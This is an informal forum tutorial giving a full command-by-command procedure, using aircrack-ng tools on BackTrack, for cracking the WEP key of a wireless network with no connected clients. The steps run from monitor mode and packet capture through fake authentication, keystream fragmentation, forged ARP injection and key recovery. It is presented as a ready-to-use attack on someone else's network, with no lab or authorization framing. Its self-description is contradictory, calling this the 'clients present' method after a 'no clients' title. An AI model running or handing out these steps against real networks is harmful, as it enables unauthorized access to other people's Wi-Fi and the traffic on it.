CRACKING WEP WITH NO CLIENTS

1. CRACKING WEP WITH NO CLIENTS
2.  
3. Ok, this tutorial should be pretty straightforward and easy, then again, thats the entire idea behind a tutorial right? Anyway, to business, this tutorial will show you how to crack WEP very quickly using the aircrack on the backtrack security liveCD, that you can find here;
4.  
5. http://www.remote-exploit.org/backtrack.html
6.  
7. **quick note, cracking WEP with no clients will be out tonight/sometime real soon**
8.  
9. We will go over
10. 1) Putting your atheros based card into monitor mode
11. 2) Getting packet injection ready
12. 3) injecting/sniffing
13. 4) Cracking the WEP
14.  
15. This is the easier method, the one where the WEP has clients present, and you can use a deauth attack on them. Ok, enough talk, to business!
16.  
17. Monitor Mode
18.  
19. The first thing to do is boot up backtrack, basically by booting to a CD like you normally would, if you can't figure this out, ask down below, or go use google. login to backtrack under root (password 'toor'), and then type "startx" into the command line to start out GUI.
20.  
21. Sweet, now we are running *nix, and we can start the good stuff. Open up a command line, but clicking on the icon that looks like one on the bottom next to the 'start' type thingy (let me know if I get to technical Smile )
22.  
23. Now, we need to enter this into the command line;
24.  
25. Code:
26. $ airmon-ng start wifi0 6
27.  
28. **starts wifi0 on channel 6, change for the channel of the network you are attacking, use kismet for this, not covered in this tutorial**
29.  
30. $ wlanconfig ath0 destroy
31. $ ifconfig ath1 up
32. $ iwconfig ath1 mode monitor 6
33.  
34.  
35. Sweet, now we have our card in monitor mode, and we can move onto bigger and better things.
36.  
37. Start up Airodump and getting some info ready
38.  
39. ok, lets start airodump so we can get some info out of it, and then we can just leave it running.
40.  
41. Code:
42. $ airodump-ng --ivs --write bob --channel 6 ath1
43.  
44. **basically heres what each thing means;
45. --ivs= only write the weak IV's, not every packet
46. --write= the prefix of the file we are writing to, so bob.ivs
47. --channel= the channel to scan on
48. ath1= our network device**
49.  
50.  
51. Now that airodump is running, we need to snag a couple pieces of information from it, 1) The MAC address of the AP we are attacking, it'll be in the first column. 2) the essid of the network, i.e. "linksys", or something similar.
52.  
53. Now, open up a new terminal (DON"T CLOSE AIRODUMP). type this line in;
54.  
55. Code:
56. $ export AP=mac_of_ap
57.  
58.  
59. Now we also have to get our mac address; this is easy in backtrack just type in the following;
60.  
61. Code:
62. $ macchanger --show ath1
63. **your output here**
64. export MAC=your_mac_address
65.  
66.  
67. This basically just stored those as variables, so you don't have to type them a bunch of times in the coming steps.
68.  
69. Getting everything ready
70.  
71. Basically what we are going to do to the network, is fake authorize ourselves using aireplay. Then using the same program, we are going to grab some peices of packets out of the replies given by fakeauth, and use those to create an arp reply packet with packetforge, to inject into the network to create IV's, so we can crack the key! Whew, lets get started!
72.  
73. First we need to set up, but NOT run our fake auth attack;
74.  
75. Code:
76. $ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1
77.  
78.  
79. so, we are running aireplay attack 1, with no delay, linksys is the essid of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our MAC address. Don't run this yet, we will soon enough.
80.  
81. Open up another command line, so we can get ready to sniff out the packets we need. Enter the following;
82.  
83. Code:
84. $ aireplay-ng -5 -b $AP -h $MAC
85.  
86.  
87. Cool, step 1 of 2 is done for getting ready to create IV's, next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it, say yes (type y and press enter). Now you can cancel the first command (stop it from fake auth'ing over and over) by pressing ctrl-c. Leave the window open.
88.  
89. Now, after we told aireplay-ng -5 yes, it should have created a .xor file. In the output, the name of it should be there. The line looks like this;
90.  
91. Code:
92. Saving Keystream in fragment-0215-124336.xor
93.  
94. **yours will be different**
95.  
96.  
97. Now, using this .xor file we can create an arp-reply package which we can inject to create weak IV's. So in the same window we ran the aireplay-ng -5 command, type in the following;
98.  
99. Code:
100. $ packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y your_.xor_file.xor -w arp-request
101.  
102.  
103. That will generate what we need, now we can run the final injection command that will inject the arp-request packets. Enter the following;
104.  
105. Code:
106. aireplay-ng -2 -r arp-request ath1
107.  
108. *you will have to say yes again btw*
109.  
110.  
111. Now you get to watch your #data column in airodump (you didn't close it did you?) skyrocket! Wait a few minutes, and when you have 100k packets (the #data column, 1 mil for 128 bit) run the following command to crack the key!
112.  
113. Code:
114. $ aircrack-ng -n 64 -b $AP *.ivs
115.  
116. **note, if its 128 bit, change 64 to 128**
117.  
118.  
119.  
120.  
121.  
122. re-edit by anonymousBelgium. lulz